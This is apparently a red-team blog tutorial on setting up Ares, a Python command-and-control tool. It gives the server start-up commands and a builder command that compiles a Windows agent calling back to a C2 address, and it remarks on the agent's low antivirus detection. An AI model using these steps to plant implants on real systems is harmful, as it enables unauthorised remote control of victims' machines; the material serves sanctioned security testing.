The high demand of Red Team assessments has increased the interest of security companies and consultants to develop command and control tools with different capabilities. Some of these tools can be used and in official engagements while some others have been developed only for research purposes.

Ares is a command and control tool which is written in Python and it was developed by Kevin Locati. It has a web interface which runs on port 8080 and it is password and passphrase protected. The database must be created in advance of running the server.

./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Ares - Server

Ares – Server

Ares - Password Setup

Ares – Password Setup

Once the password is set Ares will ask for a Passphrase to be used.

Ares - Passphrase

Ares – Passphrase

The main interface of Ares contains only three functions:

  1. Agent List
  2. Change Password
  3. Disconnect

The Agent List is the page of where all the infected hosts running the implant will appear.

Ares - Main Interface

Ares – Main Interface

The config.py in the agent folder controls the settings of the agent. Before anything else the SERVER variable must be changed to the IP address that the command and control server is running.

Ares - Agent Configuration

Ares – Agent Configuration

If wine is installed (Ares repository contains wine setup script) then the agent can be built in an executable format by running the following command:

./builder.py -p Windows --server http://192.168.1.203:8080 -o agent.exe
Ares - Creating Agent

Ares – Creating Agent

Hosts that are running the agent will appear on the agent list in the following format.

Ares - List of Agents

Ares – List of Agents

Commands can be executed on the target hosts from a field and the output will be retrieved in a console window.

Ares - Command Execution - ipconfig

Ares – Command Execution – ipconfig

Ares - Command Execution - List of Users

Ares – Command Execution – List of Users

Ares except of some basic command execution on the target host doesn’t offer other capabilities. However the agent has at the time being low detection rate against a number of antivirus.

Agent - Detection Rate

Agent – Detection Rate

Advertisements